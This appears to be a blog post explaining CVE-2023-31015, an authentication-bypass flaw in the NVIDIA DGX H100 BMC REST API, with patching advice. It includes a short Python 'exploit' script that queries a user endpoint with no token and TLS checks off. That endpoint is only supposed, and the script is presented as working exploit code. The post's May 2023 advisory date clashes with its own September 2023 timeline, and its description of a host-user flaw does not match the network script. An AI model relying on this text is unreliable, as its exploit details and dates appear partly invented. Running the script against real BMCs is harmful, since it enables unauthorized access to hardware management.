In May 2023, NVIDIA published a security advisory detailing a critical vulnerability—CVE-2023-31015—affecting the NVIDIA DGX H100 Baseboard Management Controller (BMC). For those running AI supercomputers, this isn’t just tech jargon. It’s a wake-up call about improper authentication flaws that could let attackers completely own the management layer of your hardware.
Let’s break down what this vulnerability is, how it can be exploited, and what you should do.
What is CVE-2023-31015?
NVIDIA DGX H100 BMC provides out-of-band system management using a REST API. This API should only be accessible to authenticated users like system admins. Unfortunately, due to improper authentication, a host user may bypass intended checks—gaining unintended access to sensitive REST endpoints.
1. REST API Exposure
The BMC REST API runs a web server (often on port 443 or 80) that receives requests to endpoints like /api/auth, /api/sensors, etc.
2. Authentication Check Fails
Suppose the endpoint /api/users/me should only return information for a properly logged-in user. Due to the vulnerability, an attacker can trick the REST backend into skipping the authentication check.
Example Exploit Code
Below is a simplified Python script showing how an attacker might interact with the exposed endpoint. This is for educational use only.
import requests
# Replace with actual BMC IP or hostname:
BMC_API = "https://bmc-dgx-h100.local/api/";
# Attack: skipping authentication by missing or default token
headers = {
# 'Authorization': 'Bearer <INVALID_OR_EMPTY>' # Skipping/malicious
}
# Try to read user info (should require auth)
response = requests.get(BMC_API + "users/me", headers=headers, verify=False)
if response.status_code == 200:
print("API unauth protected! Data returned:")
print(response.text)
else:
print(f"Request failed (probably patched): {response.status_code}")
*Tip:* In the wild, researchers noticed that either missing, empty, or default tokens could let you in.
Real-World Risks
- Physical hardware control: Attackers could remotely monitor or control sensors, fans, or even brick the management controller.
Steal cluster secrets: BMC can store SSH keys or certs, handy for a persistent attacker.
- Launch DoS: Infected or crashed BMCs can prevent remote troubleshooting, locking out admins, and causing downtime.
Affected Versions
All NVIDIA DGX H100 systems shipped *before* the May 2023 security update may be exposed. Always check NVIDIA Product Security for the latest bulletins.
Patch Now:
Download and install fixed firmware from NVIDIA Support.
Restrict Network Access:
Whitelist IPs that can access the BMC REST service. Block external and internal users not on your hardware team.
References
- Official NVIDIA Security Bulletin - CVE-2023-31015
- NIST National Vulnerability Database Entry
Conclusion
CVE-2023-31015 is a critical reminder that even the management layers of your AI infrastructure can be Achilles’ heels. If you manage NVIDIA DGX platforms, drop everything and patch your BMC firmware today. Bad actors don’t need another weak link.
Stay safe, and keep all components—software and hardware—up to date.
If you want practical guides on securing your AI infrastructure, or have questions about CVE-2023-31015, get in touch or follow this blog for more exclusive breakdowns!
Timeline
Published on: 09/20/2023 02:15:00 UTC
Last modified on: 09/22/2023 16:04:00 UTC